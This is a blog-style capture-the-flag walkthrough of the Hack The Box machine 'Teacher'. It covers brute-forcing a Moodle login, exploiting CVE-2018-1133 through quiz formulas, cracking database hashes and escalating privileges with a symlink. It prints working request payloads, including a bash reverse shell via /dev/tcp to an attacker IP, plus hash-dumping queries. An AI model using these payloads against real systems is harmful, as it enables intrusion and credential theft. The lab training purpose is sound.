Teacher is an easy Linux box created by mrh4sh on Hack The Box. The official walkthrough states that it’s a medium box. However, it is categorized as an easy box in the machines section. It is recommended that you have basic Linux and MySQL knowledge to complete this box. By completing this box you will learn Website Enumeration, Password Brute-Forcing, Moodle Quiz Module Exploitation, Database Enumeration, Password Cracking, and Linux Symlink Misconfiguration. Hello world, welcome to Haxez where today I will be explaining how I hacked Teacher.
First, I spawned the box and connected my attack box to the Hack The Box VPN. Once connected, I sent a ping request to the box to ensure it was online. Then I performed a Nmap scan to check what ports were open. Furthermore, I requested the service versions, asked for default scripts to be run, and that the minimum packet rate was 10000. Finally, I saved the output in all formats to files called teacher. From the results, I learned that only port 80 for HTTP was open and that it was running Apache 2.4.25.
sudo nmap -sC -sV -p- 10.129.202.224 --min-rate 10000 -oA teacher
Teacher Web Application Enumeration
Since port 80 was the only open port, I headed over to the application. There wasn’t a great deal of functionality offered by the application. It seemed fairly generic with few pages that I could interact with. For an application that calls itself Blackhat Highschool, it seemed a bit too clean. I was hoping for something dark and edgy.
Moving on, I ran whatweb against the application which told me it was an HTML 5 application with JQuery 1.11.1. Next, I navigated to index pages with various different extensions (index.html, index.php). Sure enough, the one that loaded the main page was index.html.
As I didn’t have much to go on, I decided to run gobuster to look for hidden content. Perhaps there was a hidden directory or a secret file telling me that the princess is in another castle. I told gobuster to perform a directory attack using the raft-small-words.txt wordlist in SecLists. Furthermore, I also asked it to try various different extensions and set the thread count to 50.
As a result, I learned that there was a directory called Moodle. Their GitHub page explains that Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Moodle is used for blended learning, distance education flipped classrooms, and other online learning projects in schools, universities, workplaces, and other sectors. I headed to the Moodle directory but received an error because it redirected to teacher.htb. Therefore, I added the IP address and teacher.htb domain to my /etc/hosts file and revisited the directory. Abracadabra, the site started loading.
Picture In Picture
I honestly don’t know what to say about this part of the box. I know I wouldn’t have found it if it wasn’t for a walkthrough. It’s not something I regularly check. I found Moodle but had no way to log in. However, directory listing on the images directory was enabled. Visiting each of the images loaded an image as expected, except for 5.png.
I downloaded the picture locally and used less to review the contents of the file. It wasn’t an image at all. It appeared to be a helpdesk ticket. I can’t fathom how a helpdesk ticket would have ended up on the website. For my own sanity, I’m going to pretend that the helpdesk agent and web developer are the same person. Furthermore, I’m also going to pretend that they accidentally renamed the wrong file and uploaded it. The ticket gave me the username Giovanni and a partial password of Th4C00lTeacha.
I launched Burp and headed back to the Moodle login page. Next, I populated the login form with the credentials provided in the support ticket. Then, I clicked submit and located the login request in Burp’s HTTP history. I sent the request to the intruder tool and added a character to the end of the password. Then, I highlighted that character and added the payload characters.
Next, I navigated to the payload tab but because I’m using Burp community edition, I had to create my own payloads. As a result, I combined several wordlists from the SecLists fuzzing directory so that they contained numbers 0 to 9, all alphabetical characters (lower and uppercase), and all special characters.
I then click the start attack button and watched as Burp went through each payload, appending it to the end of the password. There are other tools that I could have used to do this such as WFUZZ or FFUF but I know how to use Burp so I thought it was the best option. An indication that a specific payload has had a different result is the length of the response produced by the application. The screenshot below shows that most of the responses were 868 characters. However, the payload with the # symbol produced a response with 993 characters.
Evil Teacher Vulnerability
I wasn’t sure what the Moodle version was. I ran what web again against the teacher.htb domain Moodle directory but got nothing. As a result, I looked on Google and found that the Moodle version can be found from the Moodle Docs for this page link at the bottom of a course page. This told me that it was Moodle version 3.4.
There is a vulnerability in Moodle 3.4 with the CVE designation CVE-2018-1133. The vulnerability is also known as Evil Teacher. It could allow a user with the teacher role to perform code execution by creating a quiz. SonarSource has an excellent writeup on it so I’m not going to attempt to explain it in too much detail. Essentially, formulas are passed to an eval function which allows for code execution. So if a threat actor can create a quiz with a malicious formula in one of the questions, they may be able to execute code.
I navigated to the algebra page and enabled editing. Next, I used the add an activity or resource option to add a quiz to the Topic 1 section.
I gave the quiz a name and description and clicked next.
After that, I clicked the little blue add link on the next page and chose to add a question. Then, I selected the calculated question type as that would be likely to have the option to add a formula. Finally, I pasted the working exploit into the formula and changed the grad value to 100%.
It was time for the moment of truth. I captured the request with Burp and sent it to the repeater tool. Next, I appended the URL with a payload that would ping my box. I started tcpdump to listen out for ICMP packets that hit my tun0 adaptor and clicked send.
GET /moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcmid%3D7&appendqnumstring&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=/bin/ping+10.10.14.34 HTTP/1.1
sudo tcpdump -i tun0 -n icmp
To my surprise, it worked the first time. I started receiving ping packets from the target box.
Now that I had code execution, I modified my payload to a reverse shell, started netcat, and was able to pop a reverse shell.
GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D8%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=8&0=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.34/9001+0>%261' HTTP/1.1
Teacher System Enumeration
I couldn’t find the user flag once logged in so I checked the home directory and that there was a user called giovanna. That’s probably where the user.txt file is. I could try switching to that user with the password we logged in to Moodle with. However, I decided to take a look at the database first. I pulled the username and password from the /var/www/html/moodle/config.php file. After logging in, I was able to grab usernames and password hashes from the mdl_users table.
select id,username,password from mdl_user;
I copied the Giovannibak hash to a file on my attack box and used John to crack it with the rockyou wordlist.
I was then able to switch to the giovanni user and capture the user.txt flag.
www-data@teacher:/var/www/html/moodle$ su giovanni su giovanni Password: expelled giovanni@teacher:/var/www/html/moodle$ cd ~/ cd ~/ giovanni@teacher:~$ ls ls user.txt work giovanni@teacher:~$ cat user.txt cat user.txt 881▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓823
Teacher Privilege Escalation
The box keeps crashing meaning I have to do the above process all over again. As a result, the following explanation is going to be brief because I simply can’t be bothered with this box anymore. Looking at the time stamps on the user’s home directory I could see that something was changing fairly frequently. I set up a Python webserver and download pspy onto the box. Running pspy I noticed that a backup script was running.
The backup script was changing to the /home/giovanni/work directory and then backing up the courses directory. It was then changing the directory to /home/giovanni/work/tmp and changing the permissions to 777.
giovanni@teacher:/var/www/html/moodle/question$ cat /usr/bin/backup.sh #!/bin/bash cd /home/giovanni/work; tar -czvf tmp/backup_courses.tar.gz courses/*; cd tmp; tar -xf backup_courses.tar.gz; chmod 777 * -R;
You may have to forgive me here as I’ve reached the end of my tether. I had to restart the box about 5 times due to it crashing repeatedly. All I did was create a symbolic link from courses to /root. That way, when the script runs, the contents of the root directory will be backed up to work/tmp/courses which will allow me to capture the root flag.
giovanni@teacher:~/work$ ln -s /root courses giovanni@teacher:~/work$ ls -laSh courses giovanni@teacher:~/work$ ls courses courses.bak tmp giovanni@teacher:~/work$ cd tmp giovanni@teacher:~/work/tmp$ ls backup_courses.tar.gz courses giovanni@teacher:~/work/tmp$ cd courses giovanni@teacher:~/work/tmp/courses$ ls algebra root.txt giovanni@teacher:~/work/tmp/courses$ cat root.txt cat root.txt 63d▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓3cc
Ironically, I didn’t learn a lot from the teacher box. The Moodle exploit was interesting as I hadn’t done it before but that was about it. Unfortunately, I have to say that this is one of my least favorite boxes that I’ve completed so far. The concept is nice but the box was too flakey, well for me it was anyway. It seemed that the slightest mistake in syntax caused the box to throw a tantrum. This is on a private VIP box too so not like other people were hitting it.
I think enabling SSH would have made the box more tolerable as it would have allowed quick access to the user. I wouldn’t want this on every box but having to repeat the Moodle exploit every time the box decided to stop responding made me want to quit. Well, it’s done now and I can put it behind me. Glad I did it but didn’t enjoy it. Thanks for the box!